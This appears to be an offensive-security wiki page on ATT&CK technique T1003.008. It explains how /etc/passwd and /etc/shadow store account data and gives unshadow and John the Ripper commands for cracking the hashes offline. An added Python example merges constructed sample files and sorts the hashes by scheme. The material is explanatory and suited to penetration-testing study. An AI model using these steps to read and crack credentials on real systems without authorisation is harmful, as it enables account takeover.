Shadow File

MITRE ATT&CK™ OS Credential Dumping: /etc/passwd and /etc/shadow - Technique T1003.008

Theory

We may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux systems split account data across the two files: /etc/passwd holds the world-readable account information (username, UID, GID, home directory, shell) with an "x" in the password field, and /etc/shadow holds the actual password hashes in crypt(3) format together with password-aging fields.

By default, /etc/shadow is readable only by root (and, on many distributions, by the shadow group), so being able to read it usually means we already have elevated privileges or an arbitrary-file-read primitive. Check with `ls -l /etc/shadow` before assuming access.

Practice

If we can read both /etc/passwd and /etc/shadow, we can crack user passwords using unshadow and John The Ripper.

We can use the unshadow command (shipped with John) to combine the two files into the one-line-per-user format john expects: it copies each /etc/passwd line and replaces the "x" in the password field with that user's hash from /etc/shadow.

unshadow passwd.txt shadow.txt > passwords.txt

Then, we can crack the hashes using john.

john --wordlist=wordlist.txt passwords.txt

# If a hash in /etc/shadow starts with $y$, it is yescrypt (the default on recent
# Debian, Ubuntu and Fedora releases). If your John build has no native yescrypt
# format, use the generic "crypt" format, which hands each guess to the system's
# crypt(3); it is slower, but it works for any scheme the local libc supports.
john --format=crypt --wordlist=wordlist.txt passwords.txt

# Show what has been cracked so far.
john --show passwords.txt
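To make the merge step and the hash-prefix check concrete, here is an added Python example (not the page's own code and not part of John the Ripper) that does what unshadow does on two constructed files, identifies the crypt(3) scheme of each hash, and drops the entries that cannot be cracked (no password, "*" or "!" placeholders). The sample passwd and shadow contents, the hash strings and the SCHEMES table are all constructed for illustration; the hash bodies are placeholders, not real digests.

```python
"""Minimal unshadow-style merge plus hash-scheme triage (added example)."""
from typing import List, Optional, Tuple

# Constructed sample data modelled on real /etc/passwd and /etc/shadow layouts.
# The hash bodies are filler text, not genuine crypt(3) output.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
legacy:x:1002:1002:Legacy:/home/legacy:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$placeholdersha512cryptbody:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
alice:$y$j9T$placeholderyescryptsalt$placeholderyescryptbody:19700:0:99999:7:::
bob:!$6$locked$placeholderhashoflockedaccount:19700:0:99999:7:::
legacy:$1$abcdefgh$placeholdermd5cryptbody:19700:0:99999:7:::
"""

# crypt(3) prefix -> (scheme name, john --format value). yescrypt has no
# dedicated john format in many builds, so it is routed through "crypt".
SCHEMES = {
    "$1$": ("md5crypt", "md5crypt"),
    "$2a$": ("bcrypt", "bcrypt"),
    "$2b$": ("bcrypt", "bcrypt"),
    "$2y$": ("bcrypt", "bcrypt"),
    "$5$": ("sha256crypt", "sha256crypt"),
    "$6$": ("sha512crypt", "sha512crypt"),
    "$y$": ("yescrypt", "crypt"),
}


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a passwd/shadow-style file into field lists, skipping blanks/comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def identify_scheme(hash_field: str) -> Optional[Tuple[str, str, bool]]:
    """Return (scheme, john_format, locked) for a shadow password field.

    None means there is nothing to crack: empty field, "*", "!!", or "x".
    A leading "!" (passwd -l) locks the account but leaves the hash intact,
    so the hash is still worth cracking (the password may be reused elsewhere).
    """
    locked = hash_field.startswith("!")
    h = hash_field.lstrip("!")
    if h in ("", "x") or h.startswith("*"):
        return None
    for prefix, (scheme, fmt) in SCHEMES.items():
        if h.startswith(prefix):
            return scheme, fmt, locked
    return "unknown", "crypt", locked   # unrecognised prefix: let libc decide


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """Merge like unshadow(8): put each user's shadow hash into passwd field 2."""
    hashes = {row[0]: row[1] for row in parse_colon_file(shadow_text) if len(row) >= 2}
    merged = []
    for row in parse_colon_file(passwd_text):
        if len(row) < 7:          # malformed passwd line, ignore
            continue
        row = row[:]
        row[1] = hashes.get(row[0], row[1])
        merged.append(":".join(row))
    return merged


def crackable(merged: List[str]) -> List[Tuple[str, str, str, bool]]:
    """(user, scheme, john_format, locked) for every merged line john can attempt."""
    out = []
    for line in merged:
        user, pw = line.split(":")[:2]
        info = identify_scheme(pw)
        if info is not None:
            out.append((user,) + info)
    return out


if __name__ == "__main__":
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    print("\n".join(merged))
    for user, scheme, fmt, locked in crackable(merged):
        note = " (account locked, hash still crackable)" if locked else ""
        print(f"{user}: {scheme} -> john --format={fmt}{note}")
```

Running it prints the merged passwords.txt-style lines and, per user, which `--format` to pass to john; daemon is dropped because "*" is not a hash, while bob's "!"-prefixed sha512crypt hash is kept and flagged as locked. Because john processes one format per run, the grouping also tells you how many separate invocations a mixed shadow file needs.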
